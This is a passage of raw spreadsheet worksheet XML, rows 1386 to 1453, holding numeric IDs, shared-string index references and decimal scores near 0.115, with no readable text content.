        <v>1238</v>
      </c>
      <c r="D1386" s="2">
        <v>1.0</v>
      </c>
      <c r="E1386" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1386" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1387" ht="15.75" customHeight="1">
      <c r="A1387" s="1">
        <v>27402.0</v>
      </c>
      <c r="B1387" s="2">
        <v>2.1801437E7</v>
      </c>
      <c r="C1387" s="2" t="s">
        <v>1256</v>
      </c>
      <c r="D1387" s="2">
        <v>1.0</v>
      </c>
      <c r="E1387" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1387" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1388" ht="15.75" customHeight="1">
      <c r="A1388" s="1">
        <v>27688.0</v>
      </c>
      <c r="B1388" s="2">
        <v>2.2976009E7</v>
      </c>
      <c r="C1388" s="2" t="s">
        <v>1257</v>
      </c>
      <c r="D1388" s="2">
        <v>1.0</v>
      </c>
      <c r="E1388" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1388" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1389" ht="15.75" customHeight="1">
      <c r="A1389" s="1">
        <v>27813.0</v>
      </c>
      <c r="B1389" s="2">
        <v>2.3316263E7</v>
      </c>
      <c r="C1389" s="2" t="s">
        <v>1258</v>
      </c>
      <c r="D1389" s="2">
        <v>1.0</v>
      </c>
      <c r="E1389" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1389" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1390" ht="15.75" customHeight="1">
      <c r="A1390" s="1">
        <v>27980.0</v>
      </c>
      <c r="B1390" s="2">
        <v>2.4034547E7</v>
      </c>
      <c r="C1390" s="2" t="s">
        <v>1241</v>
      </c>
      <c r="D1390" s="2">
        <v>1.0</v>
      </c>
      <c r="E1390" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1390" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1391" ht="15.75" customHeight="1">
      <c r="A1391" s="1">
        <v>28281.0</v>
      </c>
      <c r="B1391" s="2">
        <v>2.5483059E7</v>
      </c>
      <c r="C1391" s="2" t="s">
        <v>1259</v>
      </c>
      <c r="D1391" s="2">
        <v>1.0</v>
      </c>
      <c r="E1391" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1391" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1392" ht="15.75" customHeight="1">
      <c r="A1392" s="1">
        <v>28406.0</v>
      </c>
      <c r="B1392" s="2">
        <v>2.628424E7</v>
      </c>
      <c r="C1392" s="2" t="s">
        <v>1260</v>
      </c>
      <c r="D1392" s="2">
        <v>1.0</v>
      </c>
      <c r="E1392" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1392" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1393" ht="15.75" customHeight="1">
      <c r="A1393" s="1">
        <v>28746.0</v>
      </c>
      <c r="B1393" s="2">
        <v>2.8116082E7</v>
      </c>
      <c r="C1393" s="2" t="s">
        <v>1261</v>
      </c>
      <c r="D1393" s="2">
        <v>1.0</v>
      </c>
      <c r="E1393" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1393" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1394" ht="15.75" customHeight="1">
      <c r="A1394" s="1">
        <v>28998.0</v>
      </c>
      <c r="B1394" s="2">
        <v>2.9863736E7</v>
      </c>
      <c r="C1394" s="2" t="s">
        <v>1262</v>
      </c>
      <c r="D1394" s="2">
        <v>1.0</v>
      </c>
      <c r="E1394" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1394" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1395" ht="15.75" customHeight="1">
      <c r="A1395" s="1">
        <v>29492.0</v>
      </c>
      <c r="B1395" s="2">
        <v>3.2570315E7</v>
      </c>
      <c r="C1395" s="2" t="s">
        <v>1263</v>
      </c>
      <c r="D1395" s="2">
        <v>1.0</v>
      </c>
      <c r="E1395" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1395" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1396" ht="15.75" customHeight="1">
      <c r="A1396" s="1">
        <v>29610.0</v>
      </c>
      <c r="B1396" s="2">
        <v>3.3596438E7</v>
      </c>
      <c r="C1396" s="2" t="s">
        <v>1264</v>
      </c>
      <c r="D1396" s="2">
        <v>1.0</v>
      </c>
      <c r="E1396" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1396" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1397" ht="15.75" customHeight="1">
      <c r="A1397" s="1">
        <v>29778.0</v>
      </c>
      <c r="B1397" s="2">
        <v>3.5006535E7</v>
      </c>
      <c r="C1397" s="2" t="s">
        <v>1265</v>
      </c>
      <c r="D1397" s="2">
        <v>1.0</v>
      </c>
      <c r="E1397" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1397" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1398" ht="15.75" customHeight="1">
      <c r="A1398" s="1">
        <v>30119.0</v>
      </c>
      <c r="B1398" s="2">
        <v>3.682469E7</v>
      </c>
      <c r="C1398" s="2" t="s">
        <v>1266</v>
      </c>
      <c r="D1398" s="2">
        <v>1.0</v>
      </c>
      <c r="E1398" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1398" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1399" ht="15.75" customHeight="1">
      <c r="A1399" s="1">
        <v>30430.0</v>
      </c>
      <c r="B1399" s="2">
        <v>3.9027866E7</v>
      </c>
      <c r="C1399" s="2" t="s">
        <v>1267</v>
      </c>
      <c r="D1399" s="2">
        <v>1.0</v>
      </c>
      <c r="E1399" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1399" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1400" ht="15.75" customHeight="1">
      <c r="A1400" s="1">
        <v>30549.0</v>
      </c>
      <c r="B1400" s="2">
        <v>4.0641787E7</v>
      </c>
      <c r="C1400" s="2" t="s">
        <v>1247</v>
      </c>
      <c r="D1400" s="2">
        <v>1.0</v>
      </c>
      <c r="E1400" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1400" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1401" ht="15.75" customHeight="1">
      <c r="A1401" s="1">
        <v>30927.0</v>
      </c>
      <c r="B1401" s="2">
        <v>4.7031062E7</v>
      </c>
      <c r="C1401" s="2" t="s">
        <v>1268</v>
      </c>
      <c r="D1401" s="2">
        <v>1.0</v>
      </c>
      <c r="E1401" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1401" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1402" ht="15.75" customHeight="1">
      <c r="A1402" s="1">
        <v>31270.0</v>
      </c>
      <c r="B1402" s="2">
        <v>4944313.0</v>
      </c>
      <c r="C1402" s="2" t="s">
        <v>1269</v>
      </c>
      <c r="D1402" s="2">
        <v>1.0</v>
      </c>
      <c r="E1402" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1402" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1403" ht="15.75" customHeight="1">
      <c r="A1403" s="1">
        <v>31275.0</v>
      </c>
      <c r="B1403" s="2">
        <v>4951045.0</v>
      </c>
      <c r="C1403" s="2" t="s">
        <v>1250</v>
      </c>
      <c r="D1403" s="2">
        <v>1.0</v>
      </c>
      <c r="E1403" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1403" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1404" ht="15.75" customHeight="1">
      <c r="A1404" s="1">
        <v>32051.0</v>
      </c>
      <c r="B1404" s="2">
        <v>5.3738444E7</v>
      </c>
      <c r="C1404" s="2" t="s">
        <v>1251</v>
      </c>
      <c r="D1404" s="2">
        <v>1.0</v>
      </c>
      <c r="E1404" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1404" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1405" ht="15.75" customHeight="1">
      <c r="A1405" s="1">
        <v>33616.0</v>
      </c>
      <c r="B1405" s="2">
        <v>8343259.0</v>
      </c>
      <c r="C1405" s="2" t="s">
        <v>1270</v>
      </c>
      <c r="D1405" s="2">
        <v>1.0</v>
      </c>
      <c r="E1405" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1405" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="1406" ht="15.75" customHeight="1">
      <c r="A1406" s="1">
        <v>21909.0</v>
      </c>
      <c r="B1406" s="2">
        <v>2.8116083E7</v>
      </c>
      <c r="C1406" s="2" t="s">
        <v>1271</v>
      </c>
      <c r="D1406" s="2">
        <v>1.0</v>
      </c>
      <c r="E1406" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1406" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="1407" ht="15.75" customHeight="1">
      <c r="A1407" s="1">
        <v>24042.0</v>
      </c>
      <c r="B1407" s="2">
        <v>9510614.0</v>
      </c>
      <c r="C1407" s="2" t="s">
        <v>1272</v>
      </c>
      <c r="D1407" s="2">
        <v>1.0</v>
      </c>
      <c r="E1407" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1407" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="1408" ht="15.75" customHeight="1">
      <c r="A1408" s="1">
        <v>26192.0</v>
      </c>
      <c r="B1408" s="2">
        <v>1.6230636E7</v>
      </c>
      <c r="C1408" s="2" t="s">
        <v>1273</v>
      </c>
      <c r="D1408" s="2">
        <v>1.0</v>
      </c>
      <c r="E1408" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1408" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="1409" ht="15.75" customHeight="1">
      <c r="A1409" s="1">
        <v>28745.0</v>
      </c>
      <c r="B1409" s="2">
        <v>2.8116082E7</v>
      </c>
      <c r="C1409" s="2" t="s">
        <v>1271</v>
      </c>
      <c r="D1409" s="2">
        <v>1.0</v>
      </c>
      <c r="E1409" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1409" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="1410" ht="15.75" customHeight="1">
      <c r="A1410" s="1">
        <v>34009.0</v>
      </c>
      <c r="B1410" s="2">
        <v>9510613.0</v>
      </c>
      <c r="C1410" s="2" t="s">
        <v>1272</v>
      </c>
      <c r="D1410" s="2">
        <v>1.0</v>
      </c>
      <c r="E1410" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1410" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="1411" ht="15.75" customHeight="1">
      <c r="A1411" s="1">
        <v>10316.0</v>
      </c>
      <c r="B1411" s="2">
        <v>5.769313E7</v>
      </c>
      <c r="C1411" s="2" t="s">
        <v>1274</v>
      </c>
      <c r="D1411" s="2">
        <v>1.0</v>
      </c>
      <c r="E1411" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1411" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="1412" ht="15.75" customHeight="1">
      <c r="A1412" s="1">
        <v>24616.0</v>
      </c>
      <c r="B1412" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C1412" s="2" t="s">
        <v>1275</v>
      </c>
      <c r="D1412" s="2">
        <v>1.0</v>
      </c>
      <c r="E1412" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1412" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="1413" ht="15.75" customHeight="1">
      <c r="A1413" s="1">
        <v>22935.0</v>
      </c>
      <c r="B1413" s="2">
        <v>4.8694111E7</v>
      </c>
      <c r="C1413" s="2" t="s">
        <v>1276</v>
      </c>
      <c r="D1413" s="2">
        <v>1.0</v>
      </c>
      <c r="E1413" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1413" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="1414" ht="15.75" customHeight="1">
      <c r="A1414" s="1">
        <v>23070.0</v>
      </c>
      <c r="B1414" s="2">
        <v>5.0476235E7</v>
      </c>
      <c r="C1414" s="2" t="s">
        <v>1277</v>
      </c>
      <c r="D1414" s="2">
        <v>1.0</v>
      </c>
      <c r="E1414" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1414" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="1415" ht="15.75" customHeight="1">
      <c r="A1415" s="1">
        <v>30532.0</v>
      </c>
      <c r="B1415" s="2">
        <v>4.0468253E7</v>
      </c>
      <c r="C1415" s="2" t="s">
        <v>1278</v>
      </c>
      <c r="D1415" s="2">
        <v>1.0</v>
      </c>
      <c r="E1415" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1415" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="1416" ht="15.75" customHeight="1">
      <c r="A1416" s="1">
        <v>25428.0</v>
      </c>
      <c r="B1416" s="2">
        <v>1.3821075E7</v>
      </c>
      <c r="C1416" s="2" t="s">
        <v>1279</v>
      </c>
      <c r="D1416" s="2">
        <v>1.0</v>
      </c>
      <c r="E1416" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1416" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="1417" ht="15.75" customHeight="1">
      <c r="A1417" s="1">
        <v>3673.0</v>
      </c>
      <c r="B1417" s="2">
        <v>394303.0</v>
      </c>
      <c r="C1417" s="2" t="s">
        <v>1280</v>
      </c>
      <c r="D1417" s="2">
        <v>1.0</v>
      </c>
      <c r="E1417" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1417" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="1418" ht="15.75" customHeight="1">
      <c r="A1418" s="1">
        <v>16624.0</v>
      </c>
      <c r="B1418" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C1418" s="2" t="s">
        <v>1281</v>
      </c>
      <c r="D1418" s="2">
        <v>1.0</v>
      </c>
      <c r="E1418" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1418" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="1419" ht="15.75" customHeight="1">
      <c r="A1419" s="1">
        <v>23256.0</v>
      </c>
      <c r="B1419" s="2">
        <v>5.3160492E7</v>
      </c>
      <c r="C1419" s="2" t="s">
        <v>1282</v>
      </c>
      <c r="D1419" s="2">
        <v>1.0</v>
      </c>
      <c r="E1419" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1419" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="1420" ht="15.75" customHeight="1">
      <c r="A1420" s="1">
        <v>25320.0</v>
      </c>
      <c r="B1420" s="2">
        <v>1.3439676E7</v>
      </c>
      <c r="C1420" s="2" t="s">
        <v>1283</v>
      </c>
      <c r="D1420" s="2">
        <v>1.0</v>
      </c>
      <c r="E1420" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1420" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="1421" ht="15.75" customHeight="1">
      <c r="A1421" s="1">
        <v>4347.0</v>
      </c>
      <c r="B1421" s="2">
        <v>4.2085604E7</v>
      </c>
      <c r="C1421" s="2" t="s">
        <v>1284</v>
      </c>
      <c r="D1421" s="2">
        <v>1.0</v>
      </c>
      <c r="E1421" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1421" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="1422" ht="15.75" customHeight="1">
      <c r="A1422" s="1">
        <v>15152.0</v>
      </c>
      <c r="B1422" s="2">
        <v>4.1969761E7</v>
      </c>
      <c r="C1422" s="2" t="s">
        <v>1285</v>
      </c>
      <c r="D1422" s="2">
        <v>1.0</v>
      </c>
      <c r="E1422" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1422" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="1423" ht="15.75" customHeight="1">
      <c r="A1423" s="1">
        <v>21404.0</v>
      </c>
      <c r="B1423" s="2">
        <v>2.192391E7</v>
      </c>
      <c r="C1423" s="2" t="s">
        <v>1286</v>
      </c>
      <c r="D1423" s="2">
        <v>1.0</v>
      </c>
      <c r="E1423" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1423" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="1424" ht="15.75" customHeight="1">
      <c r="A1424" s="1">
        <v>24307.0</v>
      </c>
      <c r="B1424" s="2">
        <v>1.0580678E7</v>
      </c>
      <c r="C1424" s="2" t="s">
        <v>1287</v>
      </c>
      <c r="D1424" s="2">
        <v>1.0</v>
      </c>
      <c r="E1424" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1424" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="1425" ht="15.75" customHeight="1">
      <c r="A1425" s="1">
        <v>24561.0</v>
      </c>
      <c r="B1425" s="2">
        <v>1.1301177E7</v>
      </c>
      <c r="C1425" s="2" t="s">
        <v>1288</v>
      </c>
      <c r="D1425" s="2">
        <v>1.0</v>
      </c>
      <c r="E1425" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1425" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="1426" ht="15.75" customHeight="1">
      <c r="A1426" s="1">
        <v>13000.0</v>
      </c>
      <c r="B1426" s="2">
        <v>3.2810142E7</v>
      </c>
      <c r="C1426" s="2" t="s">
        <v>1289</v>
      </c>
      <c r="D1426" s="2">
        <v>1.0</v>
      </c>
      <c r="E1426" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1426" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1427" ht="15.75" customHeight="1">
      <c r="A1427" s="1">
        <v>18440.0</v>
      </c>
      <c r="B1427" s="2">
        <v>5.2777446E7</v>
      </c>
      <c r="C1427" s="2" t="s">
        <v>1290</v>
      </c>
      <c r="D1427" s="2">
        <v>1.0</v>
      </c>
      <c r="E1427" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1427" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1428" ht="15.75" customHeight="1">
      <c r="A1428" s="1">
        <v>22721.0</v>
      </c>
      <c r="B1428" s="2">
        <v>4.3577257E7</v>
      </c>
      <c r="C1428" s="2" t="s">
        <v>1291</v>
      </c>
      <c r="D1428" s="2">
        <v>1.0</v>
      </c>
      <c r="E1428" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1428" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1429" ht="15.75" customHeight="1">
      <c r="A1429" s="1">
        <v>25472.0</v>
      </c>
      <c r="B1429" s="2">
        <v>1.4006083E7</v>
      </c>
      <c r="C1429" s="2" t="s">
        <v>1292</v>
      </c>
      <c r="D1429" s="2">
        <v>1.0</v>
      </c>
      <c r="E1429" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1429" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1430" ht="15.75" customHeight="1">
      <c r="A1430" s="1">
        <v>27094.0</v>
      </c>
      <c r="B1430" s="2">
        <v>2.05344E7</v>
      </c>
      <c r="C1430" s="2" t="s">
        <v>1293</v>
      </c>
      <c r="D1430" s="2">
        <v>1.0</v>
      </c>
      <c r="E1430" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1430" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1431" ht="15.75" customHeight="1">
      <c r="A1431" s="1">
        <v>28138.0</v>
      </c>
      <c r="B1431" s="2">
        <v>2.4795066E7</v>
      </c>
      <c r="C1431" s="2" t="s">
        <v>1294</v>
      </c>
      <c r="D1431" s="2">
        <v>1.0</v>
      </c>
      <c r="E1431" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1431" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1432" ht="15.75" customHeight="1">
      <c r="A1432" s="1">
        <v>31545.0</v>
      </c>
      <c r="B1432" s="2">
        <v>5108013.0</v>
      </c>
      <c r="C1432" s="2" t="s">
        <v>1295</v>
      </c>
      <c r="D1432" s="2">
        <v>1.0</v>
      </c>
      <c r="E1432" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1432" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1433" ht="15.75" customHeight="1">
      <c r="A1433" s="1">
        <v>32286.0</v>
      </c>
      <c r="B1433" s="2">
        <v>5536232.0</v>
      </c>
      <c r="C1433" s="2" t="s">
        <v>1296</v>
      </c>
      <c r="D1433" s="2">
        <v>1.0</v>
      </c>
      <c r="E1433" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1433" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1434" ht="15.75" customHeight="1">
      <c r="A1434" s="1">
        <v>32934.0</v>
      </c>
      <c r="B1434" s="2">
        <v>6445421.0</v>
      </c>
      <c r="C1434" s="2" t="s">
        <v>1297</v>
      </c>
      <c r="D1434" s="2">
        <v>1.0</v>
      </c>
      <c r="E1434" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1434" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1435" ht="15.75" customHeight="1">
      <c r="A1435" s="1">
        <v>34105.0</v>
      </c>
      <c r="B1435" s="2">
        <v>9701813.0</v>
      </c>
      <c r="C1435" s="2" t="s">
        <v>1298</v>
      </c>
      <c r="D1435" s="2">
        <v>1.0</v>
      </c>
      <c r="E1435" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1435" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="1436" ht="15.75" customHeight="1">
      <c r="A1436" s="1">
        <v>11613.0</v>
      </c>
      <c r="B1436" s="2">
        <v>2.3059731E7</v>
      </c>
      <c r="C1436" s="2" t="s">
        <v>1299</v>
      </c>
      <c r="D1436" s="2">
        <v>1.0</v>
      </c>
      <c r="E1436" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1436" s="2">
        <v>0.1150234741784038</v>
      </c>
    </row>
    <row r="1437" ht="15.75" customHeight="1">
      <c r="A1437" s="1">
        <v>5835.0</v>
      </c>
      <c r="B1437" s="2">
        <v>4.6905201E7</v>
      </c>
      <c r="C1437" s="2" t="s">
        <v>1300</v>
      </c>
      <c r="D1437" s="2">
        <v>1.0</v>
      </c>
      <c r="E1437" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1437" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1438" ht="15.75" customHeight="1">
      <c r="A1438" s="1">
        <v>7228.0</v>
      </c>
      <c r="B1438" s="2">
        <v>5.0660704E7</v>
      </c>
      <c r="C1438" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="D1438" s="2">
        <v>1.0</v>
      </c>
      <c r="E1438" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1438" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1439" ht="15.75" customHeight="1">
      <c r="A1439" s="1">
        <v>8376.0</v>
      </c>
      <c r="B1439" s="2">
        <v>5.3812002E7</v>
      </c>
      <c r="C1439" s="2" t="s">
        <v>1302</v>
      </c>
      <c r="D1439" s="2">
        <v>1.0</v>
      </c>
      <c r="E1439" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1439" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1440" ht="15.75" customHeight="1">
      <c r="A1440" s="1">
        <v>12897.0</v>
      </c>
      <c r="B1440" s="2">
        <v>3.2059114E7</v>
      </c>
      <c r="C1440" s="2" t="s">
        <v>1303</v>
      </c>
      <c r="D1440" s="2">
        <v>1.0</v>
      </c>
      <c r="E1440" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1440" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1441" ht="15.75" customHeight="1">
      <c r="A1441" s="1">
        <v>22964.0</v>
      </c>
      <c r="B1441" s="2">
        <v>4918685.0</v>
      </c>
      <c r="C1441" s="2" t="s">
        <v>1304</v>
      </c>
      <c r="D1441" s="2">
        <v>1.0</v>
      </c>
      <c r="E1441" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1441" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1442" ht="15.75" customHeight="1">
      <c r="A1442" s="1">
        <v>23255.0</v>
      </c>
      <c r="B1442" s="2">
        <v>5.3160492E7</v>
      </c>
      <c r="C1442" s="2" t="s">
        <v>1305</v>
      </c>
      <c r="D1442" s="2">
        <v>1.0</v>
      </c>
      <c r="E1442" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1442" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1443" ht="15.75" customHeight="1">
      <c r="A1443" s="1">
        <v>23644.0</v>
      </c>
      <c r="B1443" s="2">
        <v>6711923.0</v>
      </c>
      <c r="C1443" s="2" t="s">
        <v>1306</v>
      </c>
      <c r="D1443" s="2">
        <v>1.0</v>
      </c>
      <c r="E1443" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1443" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1444" ht="15.75" customHeight="1">
      <c r="A1444" s="1">
        <v>26630.0</v>
      </c>
      <c r="B1444" s="2">
        <v>1.8043957E7</v>
      </c>
      <c r="C1444" s="2" t="s">
        <v>1307</v>
      </c>
      <c r="D1444" s="2">
        <v>1.0</v>
      </c>
      <c r="E1444" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1444" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1445" ht="15.75" customHeight="1">
      <c r="A1445" s="1">
        <v>31969.0</v>
      </c>
      <c r="B1445" s="2">
        <v>5.3160491E7</v>
      </c>
      <c r="C1445" s="2" t="s">
        <v>1305</v>
      </c>
      <c r="D1445" s="2">
        <v>1.0</v>
      </c>
      <c r="E1445" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1445" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1446" ht="15.75" customHeight="1">
      <c r="A1446" s="1">
        <v>32111.0</v>
      </c>
      <c r="B1446" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C1446" s="2" t="s">
        <v>1308</v>
      </c>
      <c r="D1446" s="2">
        <v>1.0</v>
      </c>
      <c r="E1446" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1446" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1447" ht="15.75" customHeight="1">
      <c r="A1447" s="1">
        <v>32876.0</v>
      </c>
      <c r="B1447" s="2">
        <v>6333282.0</v>
      </c>
      <c r="C1447" s="2" t="s">
        <v>1309</v>
      </c>
      <c r="D1447" s="2">
        <v>1.0</v>
      </c>
      <c r="E1447" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1447" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="1448" ht="15.75" customHeight="1">
      <c r="A1448" s="1">
        <v>53.0</v>
      </c>
      <c r="B1448" s="2">
        <v>1.0968538E7</v>
      </c>
      <c r="C1448" s="2" t="s">
        <v>1310</v>
      </c>
      <c r="D1448" s="2">
        <v>1.0</v>
      </c>
      <c r="E1448" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1448" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1449" ht="15.75" customHeight="1">
      <c r="A1449" s="1">
        <v>812.0</v>
      </c>
      <c r="B1449" s="2">
        <v>2.1363844E7</v>
      </c>
      <c r="C1449" s="2" t="s">
        <v>1311</v>
      </c>
      <c r="D1449" s="2">
        <v>1.0</v>
      </c>
      <c r="E1449" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1449" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1450" ht="15.75" customHeight="1">
      <c r="A1450" s="1">
        <v>1545.0</v>
      </c>
      <c r="B1450" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C1450" s="2" t="s">
        <v>1312</v>
      </c>
      <c r="D1450" s="2">
        <v>1.0</v>
      </c>
      <c r="E1450" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1450" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1451" ht="15.75" customHeight="1">
      <c r="A1451" s="1">
        <v>2026.0</v>
      </c>
      <c r="B1451" s="2">
        <v>3.0785514E7</v>
      </c>
      <c r="C1451" s="2" t="s">
        <v>1313</v>
      </c>
      <c r="D1451" s="2">
        <v>1.0</v>
      </c>
      <c r="E1451" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1451" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1452" ht="15.75" customHeight="1">
      <c r="A1452" s="1">
        <v>2787.0</v>
      </c>
      <c r="B1452" s="2">
        <v>3.522975E7</v>
      </c>
      <c r="C1452" s="2" t="s">
        <v>1314</v>
      </c>
      <c r="D1452" s="2">
        <v>1.0</v>
      </c>
      <c r="E1452" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1452" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1453" ht="15.75" customHeight="1">
      <c r="A1453" s="1">
        <v>3319.0</v>
      </c>
      <c r="B1453" s="2">
        <v>3.7645974E7</v>
      </c>
      <c r="C1453" s="2" t="s">
        <v>1315</v>
      </c>
      <c r="D1453" s="2">
        <v>1.0</v>
      </c>
      <c r="E1453" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1453" s="2">
